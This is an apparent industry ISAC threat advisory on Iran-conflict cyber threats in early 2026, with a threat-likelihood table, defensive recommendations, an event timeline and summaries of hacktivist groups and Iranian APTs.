Executive Summary
In late February 2026, the United States and Israel launched joint airstrikes against a wide array of facilities in Iran. Retaliatory strikes have followed, with the conflict escalating to multiple nations in the Middle East. Beyond physical threats to employees and facilities, cyber threats related to the conflict with potential impact on retail and hospitality organizations could include: hacktivist attacks such as defacement, increased social engineering activity leveraging the conflict as a lure theme, fraudsters leveraging the opportunity to target travelers, and potential critical infrastructure disruption. RH-ISAC Core Members are encouraged to maintain situational awareness rand to take defensive action where possible.
Key Cyber Takeaways
1. Cyber Operations Were Integral to the Kinetic Strikes and Have Lasting Impact
A coordinated electronic warfare and DDoS campaign impacted Iranian command-and-control before bombs landed, taking internet connectivity to 4% and likely hindering counterattack coordination
2. Iran’s Cyber Retaliation Is Asymmetric and Decentralized
With conventional military capability potentially degraded, cyber operations could become a mode of retaliation. Pro-Iranian threat groups are often located outside Iranian borders and have varying levels of capability, most often tending towards website defacement
3. Hacktivism Is Amplifying State Objectives
Researchers report over 600 related cyberattack claims across 100+ Telegram channels within days, mirroring the pattern observed in the June 2025 Twelve-Day War. Hacktivism can expand the attack surface, complicate attribution, and create psychological and media pressure
4. The Target Perimeter Is Widening to Social Engineering and Fraud
Cyber operations have expanded beyond Israel to Gulf states, Jordan, Cyprus, and the United States. INC Ransomware explicitly framed an Israeli company listing as a political act, not financial. This starts to erase the line between financially-motivated ransomware and state-aligned disruption. Additionally, non-Iranian aligned threat groups are likely to leverage the conflict as content for social engineering campaigns and especially fraud activity targeting stranded tourists in the region
5. ICS/OT Systems Are Now Explicitly in Scope
The shift from web defacements toward claimed PLC access and power plant manipulation marks a qualitative escalation. Energy, water, and industrial control systems could face direct targeting by high-competency Iranian stat-backed APTs
Likely Threats
Threat |
Likelihood |
Primary Targets |
DDoS campaigns against government portals |
Very High |
Israel, Gulf states, Jordan, US |
Spear phishing and credential harvesting |
Very High |
NGOs, diplomats, defense contractors, media |
ICS/OT targeting of energy infrastructure |
High |
Energy sector across the Middle East and Gulf |
Hack-and-leak / doxxing operations |
High |
US military-linked entities, Israeli firms |
Ransomware with political framing |
High |
Israeli and Gulf commercial targets |
Wiper malware deployment |
Moderate-High |
High-value government and defense networks |
Influence operations and fabricated breach claims |
Very High |
All sectors, designed to force public response |
Defensive Options
Identity and Access
- Enforce MFA on all accounts without exception
- Revoke unnecessary remote access privileges immediately
- Remove unmanaged RMM tools – MuddyWater actively abuses them for persistence
- Rotate credentials for all privileged and cloud administrator accounts
Network and Perimeter
- Patch all internet-facing devices, VPN appliances, and edge infrastructure – Fox Kitten specializes in unpatched perimeters
- Review DNS query logs for anomalous patterns; OilRig uses DNS hijacking for exfiltration
- Activate DDoS mitigation on all public-facing portals
- Segment and isolate all ICS/OT environments from IT networks
Detection and Response
- Deploy detection rules for PowerShell loaders, RMM abuse, and spear phishing TTPs aligned to MuddyWater and OilRig
- Establish protocols for responding to Telegram breach claims before media amplification forces a reactive public response
- Brief senior leadership on the information operations dimension; fabricated claims and leaked documents are deliberate tools
Cloud and Communications
- Audit credentials across Microsoft 365, Google Workspace, and collaboration platforms
- Revoke and reissue all active session tokens
- Enable login anomaly alerting; APT42 operates almost entirely within cloud environments post-compromise
Staff Awareness
- Issue immediate awareness briefings: credential harvesting via social engineering is the primary threat vector, not malware
- Treat all inbound outreach from journalists, researchers, or conference organizers as potentially adversarial until independently verified
- Never enter credentials via links received by email, WhatsApp, or Telegram
Timeline of Key Events
February 26, 2026
- US-Iran nuclear talks in Geneva end without a breakthrough; Oman describes “significant progress”
February 28, 2026: Operation Epic Fury
- The United States and Israel launch coordinated strikes targeting Iran’s military command, missile infrastructure, and senior leadership, including Khamenei, the Defense Minister, the IRGC commander, and the army chief of staff
- Simultaneous cyberattack takes Iran’s internet connectivity to 4% of normal levels; IRNA goes offline; Tasnim (IRGC-affiliated) is hacked and displays anti-Khamenei messages
- Iranian retaliation strikes 27 US military bases; Bahrain’s 5th Fleet HQ struck; Kuwait airport hit; drone hits Dubai’s Fairmont Hotel; Abu Dhabi airport struck.Hacktivist collectives begin mobilizing on Telegram; “Cyber Islamic Resistance” forms an Electronic Operations Room
March 1, 2026
- RipperSec DDoS claim against K-DEFENSE CORPORATION (Korea)
- Lapsus$ lists Lacoste, Eni Energy, and Loozap as victims
March 2, 2026: Escalation Day
- Cyber Islamic Resistance claims access to PLC controllers and energy monitoring dashboards
- APT IRAN claims infiltration of Jordan’s power plant control systems, alleging 75% reduction in electricity output
- INC Ransomware lists Israeli entity ramet-trom[.]co[.]il, claiming ~1 TB of exfiltrated data including blueprints and contracts, framed as a political attack
- DieNet publishes structured target lists across Qatar, Bahrain, UAE, Kuwait, and Saudi Arabia
- Website defacements coordinated across Israeli sites by Cyber Islamic Resistance and Cyb3r Drag0nz
- DragonForce ransomware claims against TIW Group and FGV Brazil
- DieNet begins framing Cyprus as a legitimate target due to British military bases
March 3, 2026
- Handala claims breach of Saudi Aramco, alleging destruction of infrastructure and halting of oil extraction (unverified)
- Handala claims breach of Israel Opportunity Energy
- RipperSec DDoS against Israel Deaf Sports Organisation
- Iranian drone confirmed to have struck Cyprus – validating prior hacktivist threat signaling
Threat Actor Summary
Active Hacktivist Collectives
- Handala – Highly active; targeting Israeli energy, fuel, military communications, and now claiming Saudi Aramco. Focuses on strategic infrastructure rather than symbolic sites
- Cyber Islamic Resistance / 313 Team – Formed a unified Electronic Operations Room; claiming ICS/OT access, targeting Gulf government portals
- DieNet – Provides DDoS tooling as an arsenal for smaller groups; targeting Gulf states, government, airports, banks, utilities
- RipperSec – Joined the Islamic Cyber Resistance axis; executing DDoS against Israeli and regional targets
- Moroccan Black Cyber Army – Claimed attack on TCS Communications (Tel Aviv), targeting telecom service layer
- Nation of Saviors – Doxxing US military-related entities; data breach claims against Saudi firms
- DragonForce / INC Ransomware – Conducting politically framed ransomware attacks against Israeli and regional entities
State-Linked Iranian APTs
Group |
Key Focus |
Notable Tactics |
APT33 |
Aerospace, energy, defense |
Spear phishing, custom malware, wipers |
APT34 / OilRig |
Middle East gov, telecom, finance |
DNS hijacking, credential harvesting |
APT35 / Charming Kitten |
Journalists, academics, policy |
Social engineering, cloud credential theft |
APT42 |
NGOs, civil society, healthcare |
Impersonation, cloud environment exploitation |
MuddyWater |
Government, transport, industrial |
RMM tool abuse, PowerShell loaders |
CyberAv3ngers |
Water utilities, ICS/OT |
PLC exploitation, OT device defacement |
Fox Kitten |
VPN appliances, edge devices |
Unpatched perimeter exploitation |
